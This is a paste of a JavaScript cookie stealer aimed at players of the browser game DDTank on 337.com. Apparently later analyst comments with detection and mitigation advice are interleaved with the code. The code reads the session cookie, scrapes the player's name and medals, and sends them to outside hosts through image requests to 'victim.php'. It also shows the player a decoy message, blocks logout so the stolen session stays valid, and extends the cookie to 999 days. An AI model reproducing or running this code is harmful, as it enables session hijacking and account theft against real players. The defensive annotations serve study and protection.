nPhoenix

[DDTank] Cookie Stealer

Mar 5th, 2013
  1. /* BY PHOENIX, PORRA */
  // Analyst note: the statements below read a cookie from the current page and
  // later pass it to a third-party host (see the `new Image().src` assignments
  // further down). How the script reaches the page is not shown in this listing;
  // the bare `return` statements suggest it is the body of a wrapper function
  // -- TODO confirm.
  //
  // Guard 1: continue only when the current URL matches "337.com"; otherwise
  // show a Portuguese prompt asking the user to run it on a DDTank page.
  2. if (!location.href.match("337.com")) {
  3.     alert("Por favor, faça em uma página do DDTank!");
  4.     return false;
  5. };
  // Guard 2: `i` is not defined anywhere in this listing. It is forwarded as the
  // `i` query parameter of the outbound request below; presumably an identifier
  // supplied by whatever wraps this code -- TODO confirm.
  6. if (!i) {
  7.     return false;
  8. };
  // Guard 3: requires the `elx337_user` cookie. It is read through
  // document.cookie, so the check can only succeed if that cookie is
  // script-readable (i.e. not flagged HttpOnly). With HttpOnly set, this check
  // would fail and the script would stop here with a "please log in" dialog.
  9. if (!document.cookie.match("elx337_user")) {
  10.     elex.dialog.show({
  11.         type: "text",
  12.         value: "Por favor, conecte-se."
  13.     }, null);
  14.     return false;
  15. };
  // `player` is assigned without a declaration, so in sloppy mode it becomes an
  // implicit global. `session` holds the elx337_user value taken from
  // document.cookie; the script treats it as the session token. `name` and
  // `medals` are filled in later by the AJAX callbacks.
  16. player = {
  17.     session: document.cookie.match(/elx337_user=(.+);/)[0].split("=")[1].split(";")[0],
  18.     name: undefined,
  19.     medals: undefined
  20. };
  // Branch for pages whose URL matches "br.337.com".
  // Step 1: same-origin request to /user/profile (relative URL, so it is sent
  // with the user's own cookies) and regex-scraping of the returned HTML for the
  // display name and a "medals" value.
  // Step 2: the collected values leave the browser as the query string of an
  // image request to a host outside 337.com, over plain HTTP.
  // Detection: look for requests that originate from 337.com pages, target an
  // unrelated host, and carry `session=`, `name=`, `medals=` and `i=`
  // parameters; with a GET request these values also end up in proxy and web
  // server logs.
  // Mitigation: HttpOnly on the session cookie, plus a Content-Security-Policy
  // whose img-src does not allow arbitrary hosts, would block this path.
  // NOTE(review): "site.com.br" looks like a placeholder host; the second
  // branch of this listing uses a different one -- confirm before treating it
  // as an indicator.
  21. if (location.href.match("br.337.com")) {
  22.     $.ajax({
  23.         url: "/user/profile",
  24.         success: function (x) {
  25.             player["name"] = x.match(/headUserName">(.+)</)[0].split(">")[1].split("<")[0];
  26.             player["medals"] = x.match(/<font>(.+\/.+)/gi)[0].replace('<b>', '').replace('</b>', '').split('>')[1].split('<')[0];
              // Outbound image request: session, name, medals and `i` leave the page here.
  27.             new Image().src = "http://site.com.br/php/victim.php?session=" + escape(player.session) + "&name=" + escape(player.name) + "&medals=" + escape(player.medals) + "&i=" + i;
              // Decoy shown to the user: "<name>, please wait a moment, ok?"
  28.             elex.dialog.show({
  29.                 type: "text",
  30.                 value: "<b>" + player.name + "</b>, aguarde um pouco, ok?"
  31.             }, null);
  32.         }
  33.     });
  34. };
  // Branch for pages whose URL matches "apps.337.com". Same pattern as the
  // br.337.com branch: a same-origin request (here to /ddtank), regex-scraping
  // of the display name, then an image request that carries the cookie value to
  // an external host over plain HTTP. `medals` is not scraped here; it is set to
  // the literal "[Indefinido]" ("undefined").
  // Detection and mitigation are the same as for the other branch: watch for
  // off-site requests with `session=`/`name=`/`medals=`/`i=` parameters, set
  // HttpOnly on the session cookie, and restrict img-src via CSP.
  // The destination host differs from the one in the br.337.com branch.
  35. if (location.href.match("apps.337.com")) {
  36.     $.ajax({
  37.         url: "/ddtank",
  38.         success: function (x) {
  39.             player["name"] = x.match(/headUserName">(.+)</)[0].split('>')[1].split('<')[0];
  40.             player["medals"] = "[Indefinido]";
              // Outbound image request: session, name, medals and `i` leave the page here.
  41.             new Image().src = "http://thewixproject.com.br/php/victim.php?session=" + escape(player.session) + "&name=" + escape(player.name) + "&medals=" + escape(player.medals) + "&i=" + i;
              // Decoy shown to the user: "<name>, please wait a moment, ok?"
  42.             elex.dialog.show({
  43.                 type: "text",
  44.                 value: "<b>" + player.name + "</b>, aguarde um pouco, ok?"
  45.             }, null);
  46.         }
  47.     });
  48. };
  49. // Attached to the logout button only to close the page, so that the victim's cookie is not deleted
  // Analyst note: the click handler on #elexlogout closes the window and
  // returns false, which in jQuery cancels the click's default action and stops
  // propagation. Per the author's comment above, the intent is that a normal
  // logout never happens from this click, so the copied cookie value is not
  // invalidated by the user "logging out".
  // Defender takeaway: do not rely on user-initiated logout to end a session;
  // enforce server-side expiry and invalidation.
  50. $("#elexlogout").click(function () {
  51.     window.close();
  52.     return false;
  53. });
  54.  
  // Generic cookie setter: writes `c_name=<escaped value>` to document.cookie.
  //   c_name - cookie name
  //   value  - cookie value; passed through escape() before being written
  //   exdays - lifetime in days from now; when null/undefined no `expires`
  //            attribute is appended, so the cookie lasts for the browser session
  // No path, domain, Secure or SameSite attribute is set by this function.
  55. function setCookie(c_name, value, exdays) {
  56.     var exdate = new Date();
  57.     exdate.setDate(exdate.getDate() + exdays);
  58.     var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
  59.     document.cookie = c_name + "=" + c_value;
  60. };
  61. // Pinning the cookie on the domain for three years, theoretically making it non-expiring.
  // Analyst note: this rewrites `elx337_user` in the victim's own browser with
  // an `expires` date 999 days ahead (about 2.7 years, not three). It changes
  // only the client-side lifetime of the cookie; whether the server keeps
  // honouring the session value for that long is not visible from this listing.
  // Defender takeaway: bind session validity to a server-side expiry instead of
  // the cookie's own `expires` attribute, and rotate session identifiers.
  62. setCookie("elx337_user", player.session, 999);